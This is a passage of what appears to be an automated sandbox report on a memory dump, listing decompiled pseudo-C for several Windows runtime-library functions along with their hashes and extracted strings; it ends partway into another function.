                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: PATH
                                            • API String ID: 0-1036084923
                                            • Opcode ID: f638929315d0ee638b1fd067c2c0d9508b6e08bcd8109d215c3c2c30738a175c
                                            • Instruction ID: cca27a16bf92238830b7feba0443c06178e5c8320f1ecf613b25f0b1912722cc
                                            • Opcode Fuzzy Hash: f638929315d0ee638b1fd067c2c0d9508b6e08bcd8109d215c3c2c30738a175c
                                            • Instruction Fuzzy Hash: F6C18071D00219DFDB25DF99D881BEEBBF1FF48750F248069E981AB294D738A941CB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 80%
                                            			E0101FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                            				char _v5;
                                            				signed int _v8;
                                            				signed int _v12;
                                            				char _v16;
                                            				char _v17;
                                            				char _v20;
                                            				signed int _v24;
                                            				char _v28;
                                            				char _v32;
                                            				signed int _v40;
                                            				void* __ecx;
                                            				void* __edi;
                                            				void* __ebp;
                                            				signed int _t73;
                                            				intOrPtr* _t75;
                                            				signed int _t77;
                                            				signed int _t79;
                                            				signed int _t81;
                                            				intOrPtr _t83;
                                            				intOrPtr _t85;
                                            				intOrPtr _t86;
                                            				signed int _t91;
                                            				signed int _t94;
                                            				signed int _t95;
                                            				signed int _t96;
                                            				signed int _t106;
                                            				signed int _t108;
                                            				signed int _t114;
                                            				signed int _t116;
                                            				signed int _t118;
                                            				signed int _t122;
                                            				signed int _t123;
                                            				void* _t129;
                                            				signed int _t130;
                                            				void* _t132;
                                            				intOrPtr* _t134;
                                            				signed int _t138;
                                            				signed int _t141;
                                            				signed int _t147;
                                            				intOrPtr _t153;
                                            				signed int _t154;
                                            				signed int _t155;
                                            				signed int _t170;
                                            				void* _t174;
                                            				signed int _t176;
                                            				signed int _t177;
                                            
                                            				_t129 = __ebx;
                                            				_push(_t132);
                                            				_push(__esi);
                                            				_t174 = _t132;
                                            				_t73 =  !( *( *(_t174 + 0x18)));
                                            				if(_t73 >= 0) {
                                            					L5:
                                            					return _t73;
                                            				} else {
                                            					E00FFEEF0(0x10d7b60);
                                            					_t134 =  *0x10d7b84; // 0x77ad7b80
                                            					_t2 = _t174 + 0x24; // 0x24
                                            					_t75 = _t2;
                                            					if( *_t134 != 0x10d7b80) {
                                            						_push(3);
                                            						asm("int 0x29");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						_push(0x10d7b60);
                                            						_t170 = _v8;
                                            						_v28 = 0;
                                            						_v40 = 0;
                                            						_v24 = 0;
                                            						_v17 = 0;
                                            						_v32 = 0;
                                            						__eflags = _t170 & 0xffff7cf2;
                                            						if((_t170 & 0xffff7cf2) != 0) {
                                            							L43:
                                            							_t77 = 0xc000000d;
                                            						} else {
                                            							_t79 = _t170 & 0x0000000c;
                                            							__eflags = _t79;
                                            							if(_t79 != 0) {
                                            								__eflags = _t79 - 0xc;
                                            								if(_t79 == 0xc) {
                                            									goto L43;
                                            								} else {
                                            									goto L9;
                                            								}
                                            							} else {
                                            								_t170 = _t170 | 0x00000008;
                                            								__eflags = _t170;
                                            								L9:
                                            								_t81 = _t170 & 0x00000300;
                                            								__eflags = _t81 - 0x300;
                                            								if(_t81 == 0x300) {
                                            									goto L43;
                                            								} else {
                                            									_t138 = _t170 & 0x00000001;
                                            									__eflags = _t138;
                                            									_v24 = _t138;
                                            									if(_t138 != 0) {
                                            										__eflags = _t81;
                                            										if(_t81 != 0) {
                                            											goto L43;
                                            										} else {
                                            											goto L11;
                                            										}
                                            									} else {
                                            										L11:
                                            										_push(_t129);
                                            										_t77 = E00FF6D90( &_v20);
                                            										_t130 = _t77;
                                            										__eflags = _t130;
                                            										if(_t130 >= 0) {
                                            											_push(_t174);
                                            											__eflags = _t170 & 0x00000301;
                                            											if((_t170 & 0x00000301) == 0) {
                                            												_t176 = _a8;
                                            												__eflags = _t176;
                                            												if(__eflags == 0) {
                                            													L64:
                                            													_t83 =  *[fs:0x18];
                                            													_t177 = 0;
                                            													__eflags =  *(_t83 + 0xfb8);
                                            													if( *(_t83 + 0xfb8) != 0) {
                                            														E00FF76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                            														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                            													}
                                            													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                            													goto L15;
                                            												} else {
                                            													asm("sbb edx, edx");
                                            													_t114 = E01088938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                            													__eflags = _t114;
                                            													if(_t114 < 0) {
                                            														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                            														E00FEB150();
                                            													}
                                            													_t116 = E01086D81(_t176,  &_v16);
                                            													__eflags = _t116;
                                            													if(_t116 >= 0) {
                                            														__eflags = _v16 - 2;
                                            														if(_v16 < 2) {
                                            															L56:
                                            															_t118 = E00FF75CE(_v20, 5, 0);
                                            															__eflags = _t118;
                                            															if(_t118 < 0) {
                                            																L67:
                                            																_t130 = 0xc0000017;
                                            																goto L32;
                                            															} else {
                                            																__eflags = _v12;
                                            																if(_v12 == 0) {
                                            																	goto L67;
                                            																} else {
                                            																	_t153 =  *0x10d8638; // 0x0
                                            																	_t122 = L00FF38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                            																	_t154 = _v12;
                                            																	_t130 = _t122;
                                            																	__eflags = _t130;
                                            																	if(_t130 >= 0) {
                                            																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                            																		__eflags = _t123;
                                            																		if(_t123 != 0) {
                                            																			_t155 = _a12;
                                            																			__eflags = _t155;
                                            																			if(_t155 != 0) {
                                            																				 *_t155 = _t123;
                                            																			}
                                            																			goto L64;
                                            																		} else {
                                            																			E00FF76E2(_t154);
                                            																			goto L41;
                                            																		}
                                            																	} else {
                                            																		E00FF76E2(_t154);
                                            																		_t177 = 0;
                                            																		goto L18;
                                            																	}
                                            																}
                                            															}
                                            														} else {
                                            															__eflags =  *_t176;
                                            															if( *_t176 != 0) {
                                            																goto L56;
                                            															} else {
                                            																__eflags =  *(_t176 + 2);
                                            																if( *(_t176 + 2) == 0) {
                                            																	goto L64;
                                            																} else {
                                            																	goto L56;
                                            																}
                                            															}
                                            														}
                                            													} else {
                                            														_t130 = 0xc000000d;
                                            														goto L32;
                                            													}
                                            												}
                                            												goto L35;
                                            											} else {
                                            												__eflags = _a8;
                                            												if(_a8 != 0) {
                                            													_t77 = 0xc000000d;
                                            												} else {
                                            													_v5 = 1;
                                            													L0101FCE3(_v20, _t170);
                                            													_t177 = 0;
                                            													__eflags = 0;
                                            													L15:
                                            													_t85 =  *[fs:0x18];
                                            													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                            													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                            														L18:
                                            														__eflags = _t130;
                                            														if(_t130 != 0) {
                                            															goto L32;
                                            														} else {
                                            															__eflags = _v5 - _t130;
                                            															if(_v5 == _t130) {
                                            																goto L32;
                                            															} else {
                                            																_t86 =  *[fs:0x18];
                                            																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                            																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                            																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                            																}
                                            																__eflags = _t177;
                                            																if(_t177 == 0) {
                                            																	L31:
                                            																	__eflags = 0;
                                            																	L00FF70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                            																	goto L32;
                                            																} else {
                                            																	__eflags = _v24;
                                            																	_t91 =  *(_t177 + 0x20);
                                            																	if(_v24 != 0) {
                                            																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                            																		goto L31;
                                            																	} else {
                                            																		_t141 = _t91 & 0x00000040;
                                            																		__eflags = _t170 & 0x00000100;
                                            																		if((_t170 & 0x00000100) == 0) {
                                            																			__eflags = _t141;
                                            																			if(_t141 == 0) {
                                            																				L74:
                                            																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                            																				goto L27;
                                            																			} else {
                                            																				_t177 = E0101FD22(_t177);
                                            																				__eflags = _t177;
                                            																				if(_t177 == 0) {
                                            																					goto L42;
                                            																				} else {
                                            																					_t130 = E0101FD9B(_t177, 0, 4);
                                            																					__eflags = _t130;
                                            																					if(_t130 != 0) {
                                            																						goto L42;
                                            																					} else {
                                            																						_t68 = _t177 + 0x20;
                                            																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                            																						__eflags =  *_t68;
                                            																						_t91 =  *(_t177 + 0x20);
                                            																						goto L74;
                                            																					}
                                            																				}
                                            																			}
                                            																			goto L35;
                                            																		} else {
                                            																			__eflags = _t141;
                                            																			if(_t141 != 0) {
                                            																				_t177 = E0101FD22(_t177);
                                            																				__eflags = _t177;
                                            																				if(_t177 == 0) {
                                            																					L42:
                                            																					_t77 = 0xc0000001;
                                            																					goto L33;
                                            																				} else {
                                            																					_t130 = E0101FD9B(_t177, 0, 4);
                                            																					__eflags = _t130;
                                            																					if(_t130 != 0) {
                                            																						goto L42;
                                            																					} else {
                                            																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                            																						_t91 =  *(_t177 + 0x20);
                                            																						goto L26;
                                            																					}
                                            																				}
                                            																				goto L35;
                                            																			} else {
                                            																				L26:
                                            																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                            																				__eflags = _t94;
                                            																				L27:
                                            																				 *(_t177 + 0x20) = _t94;
                                            																				__eflags = _t170 & 0x00008000;
                                            																				if((_t170 & 0x00008000) != 0) {
                                            																					_t95 = _a12;
                                            																					__eflags = _t95;
                                            																					if(_t95 != 0) {
                                            																						_t96 =  *_t95;
                                            																						__eflags = _t96;
                                            																						if(_t96 != 0) {
                                            																							 *((short*)(_t177 + 0x22)) = 0;
                                            																							_t40 = _t177 + 0x20;
                                            																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                            																							__eflags =  *_t40;
                                            																						}
                                            																					}
                                            																				}
                                            																				goto L31;
                                            																			}
                                            																		}
                                            																	}
                                            																}
                                            															}
                                            														}
                                            													} else {
                                            														_t147 =  *( *[fs:0x18] + 0xfc0);
                                            														_t106 =  *(_t147 + 0x20);
                                            														__eflags = _t106 & 0x00000040;
                                            														if((_t106 & 0x00000040) != 0) {
                                            															_t147 = E0101FD22(_t147);
                                            															__eflags = _t147;
                                            															if(_t147 == 0) {
                                            																L41:
                                            																_t130 = 0xc0000001;
                                            																L32:
                                            																_t77 = _t130;
                                            																goto L33;
                                            															} else {
                                            																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                            																_t106 =  *(_t147 + 0x20);
                                            																goto L17;
                                            															}
                                            															goto L35;
                                            														} else {
                                            															L17:
                                            															_t108 = _t106 | 0x00000080;
                                            															__eflags = _t108;
                                            															 *(_t147 + 0x20) = _t108;
                                            															 *( *[fs:0x18] + 0xfc0) = _t147;
                                            															goto L18;
                                            														}
                                            													}
                                            												}
                                            											}
                                            											L33:
                                            										}
                                            									}
                                            								}
                                            							}
                                            						}
                                            						L35:
                                            						return _t77;
                                            					} else {
                                            						 *_t75 = 0x10d7b80;
                                            						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                            						 *_t134 = _t75;
                                            						 *0x10d7b84 = _t75;
                                            						_t73 = E00FFEB70(_t134, 0x10d7b60);
                                            						if( *0x10d7b20 != 0) {
                                            							_t73 =  *( *[fs:0x30] + 0xc);
                                            							if( *((char*)(_t73 + 0x28)) == 0) {
                                            								_t73 = E00FFFF60( *0x10d7b20);
                                            							}
                                            						}
                                            						goto L5;
                                            					}
                                            				}
                                            			}

                                            Strings
                                            • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0105BE0F
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                            • API String ID: 0-865735534
                                            • Opcode ID: b6098e2873d4be0e2fedf54b6a2ccdea86cdba3b80e2d5960ca514e3c7bf3e7f
                                            • Instruction ID: e8382970fc5a2d65bfd155e3eb680463d8e8f5685f145ddc1b5ef14940604bb8
                                            • Opcode Fuzzy Hash: b6098e2873d4be0e2fedf54b6a2ccdea86cdba3b80e2d5960ca514e3c7bf3e7f
                                            • Instruction Fuzzy Hash: 77A1F431B0060A8BEB61DB68C4507BEB7E5BF44714F0445A9EE82CB695DB38E805DB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 63%
                                            			E00FE2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                            				signed char _v8;
                                            				signed int _v12;
                                            				signed int _v16;
                                            				signed int _v20;
                                            				signed int _v24;
                                            				intOrPtr _v28;
                                            				intOrPtr _v32;
                                            				signed int _v52;
                                            				void* __esi;
                                            				void* __ebp;
                                            				intOrPtr _t55;
                                            				signed int _t57;
                                            				signed int _t58;
                                            				char* _t62;
                                            				signed char* _t63;
                                            				signed char* _t64;
                                            				signed int _t67;
                                            				signed int _t72;
                                            				signed int _t77;
                                            				signed int _t78;
                                            				signed int _t88;
                                            				intOrPtr _t89;
                                            				signed char _t93;
                                            				signed int _t97;
                                            				signed int _t98;
                                            				signed int _t102;
                                            				signed int _t103;
                                            				intOrPtr _t104;
                                            				signed int _t105;
                                            				signed int _t106;
                                            				signed char _t109;
                                            				signed int _t111;
                                            				void* _t116;
                                            
                                            				_t102 = __edi;
                                            				_t97 = __edx;
                                            				_v12 = _v12 & 0x00000000;
                                            				_t55 =  *[fs:0x18];
                                            				_t109 = __ecx;
                                            				_v8 = __edx;
                                            				_t86 = 0;
                                            				_v32 = _t55;
                                            				_v24 = 0;
                                            				_push(__edi);
                                            				if(__ecx == 0x10d5350) {
                                            					_t86 = 1;
                                            					_v24 = 1;
                                            					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                            				}
                                            				_t103 = _t102 | 0xffffffff;
                                            				if( *0x10d7bc8 != 0) {
                                            					_push(0xc000004b);
                                            					_push(_t103);
                                            					E010297C0();
                                            				}
                                            				if( *0x10d79c4 != 0) {
                                            					_t57 = 0;
                                            				} else {
                                            					_t57 = 0x10d79c8;
                                            				}
                                            				_v16 = _t57;
                                            				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                            					_t93 = _t109;
                                            					L23();
                                            				}
                                            				_t58 =  *_t109;
                                            				if(_t58 == _t103) {
                                            					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                            					_t58 = _t103;
                                            					if(__eflags == 0) {
                                            						_t93 = _t109;
                                            						E01011624(_t86, __eflags);
                                            						_t58 =  *_t109;
                                            					}
                                            				}
                                            				_v20 = _v20 & 0x00000000;
                                            				if(_t58 != _t103) {
                                            					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                            				}
                                            				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                            				_t88 = _v16;
                                            				_v28 = _t104;
                                            				L9:
                                            				while(1) {
                                            					if(E01007D50() != 0) {
                                            						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                            					} else {
                                            						_t62 = 0x7ffe0382;
                                            					}
                                            					if( *_t62 != 0) {
                                            						_t63 =  *[fs:0x30];
                                            						__eflags = _t63[0x240] & 0x00000002;
                                            						if((_t63[0x240] & 0x00000002) != 0) {
                                            							_t93 = _t109;
                                            							E0107FE87(_t93);
                                            						}
                                            					}
                                            					if(_t104 != 0xffffffff) {
                                            						_push(_t88);
                                            						_push(0);
                                            						_push(_t104);
                                            						_t64 = E01029520();
                                            						goto L15;
                                            					} else {
                                            						while(1) {
                                            							_t97 =  &_v8;
                                            							_t64 = E0101E18B(_t109 + 4, _t97, 4, _t88, 0);
                                            							if(_t64 == 0x102) {
                                            								break;
                                            							}
                                            							_t93 =  *(_t109 + 4);
                                            							_v8 = _t93;
                                            							if((_t93 & 0x00000002) != 0) {
                                            								continue;
                                            							}
                                            							L15:
                                            							if(_t64 == 0x102) {
                                            								break;
                                            							}
                                            							_t89 = _v24;
                                            							if(_t64 < 0) {
                                            								L0103DF30(_t93, _t97, _t64);
                                            								_push(_t93);
                                            								_t98 = _t97 | 0xffffffff;
                                            								__eflags =  *0x10d6901;
                                            								_push(_t109);
                                            								_v52 = _t98;
                                            								if( *0x10d6901 != 0) {
                                            									_push(0);
                                            									_push(1);
                                            									_push(0);
                                            									_push(0x100003);
                                            									_push( &_v12);
                                            									_t72 = E01029980();
                                            									__eflags = _t72;
                                            									if(_t72 < 0) {
                                            										_v12 = _t98 | 0xffffffff;
                                            									}
                                            								}
                                            								asm("lock cmpxchg [ecx], edx");
                                            								_t111 = 0;
                                            								__eflags = 0;
                                            								if(0 != 0) {
                                            									__eflags = _v12 - 0xffffffff;
                                            									if(_v12 != 0xffffffff) {
                                            										_push(_v12);
                                            										E010295D0();
                                            									}
                                            								} else {
                                            									_t111 = _v12;
                                            								}
                                            								return _t111;
                                            							} else {
                                            								if(_t89 != 0) {
                                            									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                            									_t77 = E01007D50();
                                            									__eflags = _t77;
                                            									if(_t77 == 0) {
                                            										_t64 = 0x7ffe0384;
                                            									} else {
                                            										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                            									}
                                            									__eflags =  *_t64;
                                            									if( *_t64 != 0) {
                                            										_t64 =  *[fs:0x30];
                                            										__eflags = _t64[0x240] & 0x00000004;
                                            										if((_t64[0x240] & 0x00000004) != 0) {
                                            											_t78 = E01007D50();
                                            											__eflags = _t78;
                                            											if(_t78 == 0) {
                                            												_t64 = 0x7ffe0385;
                                            											} else {
                                            												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                            											}
                                            											__eflags =  *_t64 & 0x00000020;
                                            											if(( *_t64 & 0x00000020) != 0) {
                                            												_t64 = E01067016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                            											}
                                            										}
                                            									}
                                            								}
                                            								return _t64;
                                            							}
                                            						}
                                            						_t97 = _t88;
                                            						_t93 = _t109;
                                            						E0107FDDA(_t97, _v12);
                                            						_t105 =  *_t109;
                                            						_t67 = _v12 + 1;
                                            						_v12 = _t67;
                                            						__eflags = _t105 - 0xffffffff;
                                            						if(_t105 == 0xffffffff) {
                                            							_t106 = 0;
                                            							__eflags = 0;
                                            						} else {
                                            							_t106 =  *(_t105 + 0x14);
                                            						}
                                            						__eflags = _t67 - 2;
                                            						if(_t67 > 2) {
                                            							__eflags = _t109 - 0x10d5350;
                                            							if(_t109 != 0x10d5350) {
                                            								__eflags = _t106 - _v20;
                                            								if(__eflags == 0) {
                                            									_t93 = _t109;
                                            									E0107FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                            								}
                                            							}
                                            						}
                                            						_push("RTL: Re-Waiting\n");
                                            						_push(0);
                                            						_push(0x65);
                                            						_v20 = _t106;
                                            						E01075720();
                                            						_t104 = _v28;
                                            						_t116 = _t116 + 0xc;
                                            						continue;
                                            					}
                                            				}
                                            			}


                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Re-Waiting
                                            • API String ID: 0-316354757
                                            • Opcode ID: 223fd25286f0e8e7476e6a84294292552e8d1a7b5cb6922d160d15b1e4337a57
                                            • Instruction ID: 33a3bcffa4be35dd66d0adbbbb7ecde21907ecf3c5952ac853c4377697afbf16
                                            • Opcode Fuzzy Hash: 223fd25286f0e8e7476e6a84294292552e8d1a7b5cb6922d160d15b1e4337a57
                                            • Instruction Fuzzy Hash: 87615671E00A969FDB72DB69C840BBE77ECEB84324F1402A6D991972C1D7349D019782
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 80%
                                            			E010B0EA5(void* __ecx, void* __edx) {
                                            				signed int _v20;
                                            				char _v24;
                                            				intOrPtr _v28;
                                            				unsigned int _v32;
                                            				signed int _v36;
                                            				intOrPtr _v40;
                                            				char _v44;
                                            				intOrPtr _v64;
                                            				void* __ebx;
                                            				void* __edi;
                                            				signed int _t58;
                                            				unsigned int _t60;
                                            				intOrPtr _t62;
                                            				char* _t67;
                                            				char* _t69;
                                            				void* _t80;
                                            				void* _t83;
                                            				intOrPtr _t93;
                                            				intOrPtr _t115;
                                            				char _t117;
                                            				void* _t120;
                                            
                                            				_t83 = __edx;
                                            				_t117 = 0;
                                            				_t120 = __ecx;
                                            				_v44 = 0;
                                            				if(E010AFF69(__ecx,  &_v44,  &_v32) < 0) {
                                            					L24:
                                            					_t109 = _v44;
                                            					if(_v44 != 0) {
                                            						E010B1074(_t83, _t120, _t109, _t117, _t117);
                                            					}
                                            					L26:
                                            					return _t117;
                                            				}
                                            				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                            				_t5 = _t83 + 1; // 0x1
                                            				_v36 = _t5 << 0xc;
                                            				_v40 = _t93;
                                            				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                            				asm("sbb ebx, ebx");
                                            				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                            				if(_t58 != 0) {
                                            					_push(0);
                                            					_push(0x14);
                                            					_push( &_v24);
                                            					_push(3);
                                            					_push(_t93);
                                            					_push(0xffffffff);
                                            					_t80 = E01029730();
                                            					_t115 = _v64;
                                            					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                            						_push(_t93);
                                            						E010AA80D(_t115, 1, _v20, _t117);
                                            						_t83 = 4;
                                            					}
                                            				}
                                            				if(E010AA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                            					goto L24;
                                            				}
                                            				_t60 = _v32;
                                            				_t97 = (_t60 != 0x100000) + 1;
                                            				_t83 = (_v44 -  *0x10d8b04 >> 0x14) + (_v44 -  *0x10d8b04 >> 0x14);
                                            				_v28 = (_t60 != 0x100000) + 1;
                                            				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                            				_v40 = _t62;
                                            				if(_t83 >= _t62) {
                                            					L10:
                                            					asm("lock xadd [eax], ecx");
                                            					asm("lock xadd [eax], ecx");
                                            					if(E01007D50() == 0) {
                                            						_t67 = 0x7ffe0380;
                                            					} else {
                                            						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            					}
                                            					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                            						E010A138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                            					}
                                            					if(E01007D50() == 0) {
                                            						_t69 = 0x7ffe0388;
                                            					} else {
                                            						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                            					}
                                            					if( *_t69 != 0) {
                                            						E0109FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                            					}
                                            					if(( *0x10d8724 & 0x00000008) != 0) {
                                            						E010A52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                            					}
                                            					_t117 = _v44;
                                            					goto L26;
                                            				}
                                            				while(E010B15B5(0x10d8ae4, _t83, _t97, _t97) >= 0) {
                                            					_t97 = _v28;
                                            					_t83 = _t83 + 2;
                                            					if(_t83 < _v40) {
                                            						continue;
                                            					}
                                            					goto L10;
                                            				}
                                            				goto L24;
                                            			}


                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: `
                                            • API String ID: 0-2679148245
                                            • Opcode ID: 62335bc0700b82fc9d7bb4086ca56b615d474ed638e810e35e506f61eda15644
                                            • Instruction ID: af6782fd764b6ebd0c37c1b4aad757565a746bdfba7fd8dbad8f360d486e4db5
                                            • Opcode Fuzzy Hash: 62335bc0700b82fc9d7bb4086ca56b615d474ed638e810e35e506f61eda15644
                                            • Instruction Fuzzy Hash: B5519A713043829BE325DF28E8D4B9BBBE5EB84704F04096DFAC687690D771E805CB62
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 75%
                                            			E0101F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                            				intOrPtr _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr _v16;
                                            				char* _v20;
                                            				intOrPtr _v24;
                                            				char _v28;
                                            				intOrPtr _v32;
                                            				char _v36;
                                            				char _v44;
                                            				char _v52;
                                            				intOrPtr _v56;
                                            				char _v60;
                                            				intOrPtr _v72;
                                            				void* _t51;
                                            				void* _t58;
                                            				signed short _t82;
                                            				short _t84;
                                            				signed int _t91;
                                            				signed int _t100;
                                            				signed short* _t103;
                                            				void* _t108;
                                            				intOrPtr* _t109;
                                            
                                            				_t103 = __ecx;
                                            				_t82 = __edx;
                                            				_t51 = E01004120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                            				if(_t51 >= 0) {
                                            					_push(0x21);
                                            					_push(3);
                                            					_v56 =  *0x7ffe02dc;
                                            					_v20 =  &_v52;
                                            					_push( &_v44);
                                            					_v28 = 0x18;
                                            					_push( &_v28);
                                            					_push(0x100020);
                                            					_v24 = 0;
                                            					_push( &_v60);
                                            					_v16 = 0x40;
                                            					_v12 = 0;
                                            					_v8 = 0;
                                            					_t58 = E01029830();
                                            					_t87 =  *[fs:0x30];
                                            					_t108 = _t58;
                                            					L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                            					if(_t108 < 0) {
                                            						L11:
                                            						_t51 = _t108;
                                            					} else {
                                            						_push(4);
                                            						_push(8);
                                            						_push( &_v36);
                                            						_push( &_v44);
                                            						_push(_v60);
                                            						_t108 = E01029990();
                                            						if(_t108 < 0) {
                                            							L10:
                                            							_push(_v60);
                                            							E010295D0();
                                            							goto L11;
                                            						} else {
                                            							_t109 = L01004620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                            							if(_t109 == 0) {
                                            								_t108 = 0xc0000017;
                                            								goto L10;
                                            							} else {
                                            								_t21 = _t109 + 0x18; // 0x18
                                            								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                            								 *_t109 = 1;
                                            								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                            								 *(_t109 + 0xe) = _t82;
                                            								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                            								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                            								E0102F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                            								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                            								 *((short*)(_t109 + 0xc)) =  *_t103;
                                            								_t91 =  *_t103 & 0x0000ffff;
                                            								_t100 = _t91 & 0xfffffffe;
                                            								_t84 = 0x5c;
                                            								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                            									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                            										_push(_v60);
                                            										E010295D0();
                                            										L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                            										_t51 = 0xc0000106;
                                            									} else {
                                            										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                            										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                            										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                            										goto L5;
                                            									}
                                            								} else {
                                            									L5:
                                            									 *_a4 = _t109;
                                            									_t51 = 0;
                                            								}
                                            							}
                                            						}
                                            					}
                                            				}
                                            				return _t51;
                                            			}

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: @
                                            • API String ID: 0-2766056989
                                            • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                            • Instruction ID: 8fdc252dfe0d6c5d905de37420e6de76e9be9535c9558e5b9a07d9786e5ff2c5
                                            • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                            • Instruction Fuzzy Hash: 85518F716047119FD321DF29C840AABBBF9FF48750F00892DFA9597690E7B4E914CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 75%
                                            			E01063540(intOrPtr _a4) {
                                            				signed int _v12;
                                            				intOrPtr _v88;
                                            				intOrPtr _v92;
